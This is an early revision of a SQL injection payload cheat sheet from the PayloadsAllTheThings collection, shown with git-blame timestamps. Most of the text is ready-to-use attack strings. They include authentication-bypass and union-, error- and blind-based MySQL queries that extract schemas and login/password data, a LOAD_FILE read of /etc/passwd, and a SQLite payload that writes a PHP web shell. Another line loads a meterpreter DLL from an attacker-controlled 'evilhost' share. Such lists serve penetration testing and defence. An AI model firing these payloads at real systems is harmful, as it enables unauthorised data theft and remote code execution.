PayloadsAllTheThings/SQL injection/

143 lines
6.3 KiB
Raw Normal View History

2016-10-18 06:39:17 +00:00
# SQL injection
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
2016-10-18 08:01:56 +00:00
## Authentication bypass and Entry point detection
2016-10-18 08:01:56 +00:00
2016-10-18 06:39:17 +00:00
Detection of an SQL injection entry point
2016-10-18 08:01:56 +00:00
2016-10-18 06:39:17 +00:00
" / %22
; / %3B
' ' DERP
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
Authentication bypass - use the file "Authentication Bypass.txt"
SELECT id FROM users WHERE username='input1' AND password='input2'
SELECT id FROM users WHERE username='' or true-- AND password='input2'
MySQL Union Based
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
MySQL Error Based - Basic
2016-10-18 06:39:17 +00:00
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
MYSQL Error Based - UpdateXML function
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
MYSQL Error Based - Extractvalue function
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
MySQL Blind with MAKE_SET
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
2016-10-18 06:39:17 +00:00
MySQL Time Based
2016-10-18 06:39:17 +00:00
2016-10-18 06:39:17 +00:00
MySQL Read content of a file
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
MySQL DIOS - Dump in One Shot
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
PostgreSQL Error Based - Basic
2016-11-17 03:50:34 +00:00
# SQLite
Remote Command Execution using SQLite command - Attach Database
ATTACH DATABASE /var/www/lol.php AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES (<?system($_GET[cmd]); ?>);--
Remote Command Execution using SQLite command - Load_extension
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
Note: By default this component is disabled
# Other usefull payloads
2016-10-18 06:39:17 +00:00
Polyglot injection (multicontext)
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
2016-10-18 08:01:56 +00:00
## Thanks to - Other resources
* MySQL:
- [PentestMonkey's mySQL injection cheat sheet] (
- [Reiners mySQL injection Filter Evasion Cheatsheet] (
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (
- [PentestMonkey's Oracle SQLi Cheatsheet] (
- [PentestMonkey's Postgres SQLi Cheatsheet] (
* Others
- [Access SQLi Cheatsheet] (
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (
- [SQLite3 Injection Cheat sheet] (
- [Ruby on Rails (Active Record) SQL Injection Guide] (